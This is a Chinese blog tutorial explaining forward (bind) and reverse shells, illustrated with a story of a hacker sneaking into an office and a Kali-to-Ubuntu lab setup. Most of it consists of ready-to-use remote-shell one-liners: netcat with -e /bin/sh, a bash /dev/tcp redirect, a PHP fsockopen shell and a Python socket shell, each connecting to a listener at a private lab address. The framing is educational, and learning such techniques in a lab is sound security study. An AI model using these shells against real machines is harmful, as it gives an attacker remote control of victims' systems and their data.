百度360必应搜狗淘宝本站头条
当前位置:网站首页 > IT技术 > 正文

3分钟搞懂反弹shell(sh反弹shell)

wptr33 2025-03-24 00:23 13 浏览

实际上,很早很早以前就听说过反弹shell,我最早做的网络安全实验就开始反弹shell。比如这个知乎live中的第三个实验TCP会话劫持,就反弹了shell。一年前在与攻防团队的交流会上,再次听到反弹shell,当时也没放在心上,反正挺重要的。直到今天,才算彻底明白反弹shell是咋回事。如果用一句话概述,那么反弹shell就是:

黑客控制了目标,弹一个shell,构建一个稳定的通信后门。


【网络安全】TCP-IP协议攻击 作者 ailx10


  • 先弹shell就是正向shell,后连接
  • 后弹shell就是反向shell,先监听

正向shell:客户端想要获得服务端的shell

  • 假设小黑是一名黑客
  • 他悄咪咪溜进了知乎总部大楼,发现一台刘看山的电脑,但是刘看山出门了
  • 于是小黑通过nc将这台电脑的控制权通过23333端口发射出去
  • 小黑做了一系列的操作,又悄咪咪的原路返航
  • 回到家后,通过nc连上刘看山的电脑
  • 后来,刘看山的隐私泄露了~
  • (这里小黑是客户端,刘看山是服务端,服务端发射shell)

反向shell:服务端想要获得客户端的shell(也就是反弹shell)

  • 假设小黑是一名黑客
  • 他悄咪咪溜进了知乎总部大楼,发现一台刘看山的电脑,但是刘看山出门了
  • 小黑发现电脑里有一个有趣的文件(刘看山的秘密)
  • 小黑下载这个文件到自己的U盘里,又悄咪咪的原路返航
  • 回到家后,小黑打开这个文件
  • 发现电脑被刘看山控制了~
  • (这里小黑是客户端,刘看山是服务端,客户端发射shell)

正向shell(服务端送shell)

  • 第一步:在kali rolling(服务端)上监听23333端口,并反弹shell
nc -lvp 23333 -e /bin/sh

  • 第二步:在ubuntu18(客户端)上连接kali rolling的23333端口
  • 这个时候,客户端就拿到服务端的shell控制权了
  • 可以随意控制服务端
nc 192.168.160.140 23333

反向shell(客户端送shell)

  • 第一步:在ubuntu18上选择增强版的netcat
  • 一般ubuntu默认的是free-bsd版本的nc
update-alternatives --config nc

  • 第二步:在kali rolling上启动服务端,等待客户端上钩
  • 客户端只要吃钩子,服务端就获得了客户端的shell控制权
  • 可以随意控制客户端
nc -lvp 23333

  • 第三步:在ubuntu18上启动客户端,吃钩子
nc 192.168.160.140 23333 -e /bin/sh

  • 我们发现必须客户端和服务端都安装了nc才能实现反弹shell(反向shell)
  • 但是如果其中一方没有安装nc怎么办?

bash反弹shell

  • 服务端(kali rolling上监听23333)
  • 客户端吃钩子,服务端就成功控制客户端了

  • 客户端(ubuntu18上bash反弹shell)
bash -i >& /dev/tcp/192.168.160.140/23333 0>&1

php反弹shell

  • 服务端(kali rolling上监听23333)
  • 客户端吃钩子,服务端就成功控制客户端了

  • 客户端(ubuntu18上bash反弹shell)
php -r '$f=fsockopen("192.168.160.140",23333);exec("/bin/sh -i <&3>&3 2>&3");'

python反弹shell

  • 服务端(kali rolling上监听23333)
  • 客户端吃钩子,服务端就成功控制客户端了

  • 客户端(ubuntu18上bash反弹shell)
python -c 'import socket,subprocess,os; \
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.160.140",23333));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

本篇完~

相关推荐

每天一个AI姬,AMD核显用户有福了,AI绘画打破 NVIDIA 显卡垄断

使用StableDiffusion进行AI绘画,并不一定只能使用NVIDIA英伟达显卡,甚至,也不一定只能使用独立显卡。今天我们使用AMD6800H核显,并安装了StableDif...

NETworkManager:功能强大的网络管理与问题排除工具

关于NETworkManagerNETworkManager是一款功能强大的网络管理与问题排除工具,该工具完全开源,可以帮助广大研究人员轻松管理目标网络系统并排除网络疑难问题。该工具使用远程桌面、Po...

AMD也能深度学习+免费AI绘画:StableDiffusion+ROCm部署教程!

某国政客扇扇嘴皮子,CN玩硬件和深度学习的圈子里就掀起了一场风暴,这就是著名的嘴皮子效应(误)。没了高性能计算的A100H100倒也能理解,但是美利坚这波把RTX4090禁售了就让人无语了,所以不少做...

windows 下编译 python_rtmpstream

最近在研究数字人,看了大咖的项目(https://github.com/lipku/metahuman-stream),尝试编译此项目的依赖项目python_rtmpstream(https://gi...

如何使用 Python 操作 Git 代码?GitPython 入门介绍

花下猫语:今天,我在查阅如何用Python操作Gitlab的时候,看到这篇文章,觉得还不错,特分享给大家。文中还提到了其它几种操作Git的方法,后续有机会的话,再陆续分享之~~作者:匿蟒...

网上看了不少,终于把ZlmediaKit流媒体框架搭建起来啦

你都站在2023年代了,视频通话、视频直播、视频会议、视频监控就是风口浪尖上的猪师兄,只要你学那么一丁点,拿个高薪的工作不过分吧!我也是半瓶子晃荡的,所以路人呀,共学习,同进步!本篇开始,只讲在Lin...

MacDown:一款 macOS 的强大 Markdown 编辑器

大家好,很高兴又见面了,我是"...

ZLMediaKit安装配置和推拉流

一、ZLMediaKit库简介ZLMediaKit是一个基于...

大神赞过的:学习 WebAssembly 汇编语言程序设计

文/阿里淘系F(x)Team-旭伦随着前端页面变得越来越复杂,javascript的性能问题一再被诟病。而Javascript设计时就不是为了性能优化设计的,这使得浏览器上可以运行的本地语言一...

【Docker】部署WVP视频监控平台

回来Docker系列,今天将会跟大家分享一则关于开源WVP视频监控平台的搭建。先说结论吧,一开始按照网上说的一步一步搭建没有搭建成功,不知道是版本太旧还是我这边机器有问题,尝试了好几个不同方式的搭建都...

MongoDB+GridFS存储文件方案

GridFS是MongoDB的一个内置功能,它提供一组文件操作的API以利用MongoDB存储文件,GridFS的基本原理是将文件保存在两个Collection中,一个保存文件索引,一个保存文...

【开源】强大、创新且直观的 EDA套件

今天分享的LibrePCB是...

Ollama如何制作自己的大模型?

背景Llama3发布了,这次用了...

Ollama使用指南【超全版】

一、Ollama快速入门Ollama是一个用于在本地运行大型语言模型的工具,下面将介绍如何在不同操作系统上安装和使用Ollama。官网:https://ollama.comGithub:http...

基于区块链的价值共享互联网即时通讯应用平台源码免费分享

——————关注转发之后私信回复【源码】即可免费获取到本项目所有源码基于区块链的价值共享互联网即时通讯应用平台,是一个去中心化的任何人都可以使用的通讯网络,是一款基于区块链的价值共享互联网即时通讯AP...